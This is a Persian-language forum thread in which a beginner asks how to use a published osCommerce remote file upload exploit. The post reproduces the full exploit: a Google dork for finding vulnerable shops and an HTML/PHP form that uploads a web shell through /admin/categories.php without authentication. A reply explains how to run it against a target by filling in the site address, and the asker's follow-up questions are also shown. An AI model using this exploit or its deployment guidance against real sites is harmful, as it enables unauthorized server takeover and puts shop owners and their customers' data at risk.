سلام دوستان چطور از اکسپلویت زیر استفاده می شه کرد؟
لطفا توضیح کامل و مرحله به مرحله بفرمایید

osCommerce Remote File Upload Vulnerability (/admin/categories.php)
# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [[Only registered and activated users can see links]]
# Tested on: [windows-linux-FreeBSD-Solaris]

exploit:
<html>
<head>
<title>Number 7</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="[Only registered and activated users can see links] echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=[Only registered and activated users can see links]$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]
[~] Home :info-geek.com/ # v4-team.com/cc/

این و توی localhost با استفاده از Easy_PHP ران میکنی و مقدار های خواسته شده رو میدی (مثله آدرس سایت و ...)
یا توی یه سرور آپلود میکنی و استفاده میکنی

موفق باشی

سلام دوست عزیز
ممنون
ولی خدایش خیلی مختصر و مفید بود
اگه میشه یه نمونه انجام بدین فیلم بذارین
یا یکم کامل تر توضیح بدین

رو لوکال که من اجرا کردم چیز خاصی نتونستم انجام بدم
به صورت html سیو کنید می بینید که فقط یه تب واسه آپلود داره
من تو اکسپلویت ها خیلی مبتدیم
یکم کامل plz توضیح بدین
ممنون

O_o
دیگه این خیلی ساده است
شما باید فایل و با پسوند .php ذخیره کنید بعد با Easy_php اونو اجرا کنید
یا فایل PHP رو شما چجوری اجرا میکنی ؟ اینم همونطوره

سلام مجدد
شرمنده من گیر دادم ، ولی انصافا همیشه خجالت کشیدم که سوالات ساده رو بپرسم و واسه همین یاد نگرفتم
این فایل ضمیمه رو بی زحمت نگا کن و سوالاتم و لطفا مثل دفعات قبل با صبر و حوصله جواب بده:29:
اگه هم خیلی ناشیانه بود قول بده کم بخندی بهم

و اما سوالات(بعد تماشای ضمیمه)
1.رو لوکال که اجرا شد ، بعد چه باید کرد ، منظورم اینه به چه دردی می خوره رو کامپیوتر خودم که نمی خوام شل بگیرم
2. اگه باید رو تارگت آپلود بشه و بعد اجرا بشه که دیگه remote file upldate نیست و اگه به ادمین تارگت دسترسی باشه که این اکسپلویت لازم نیست

چاکریم:78: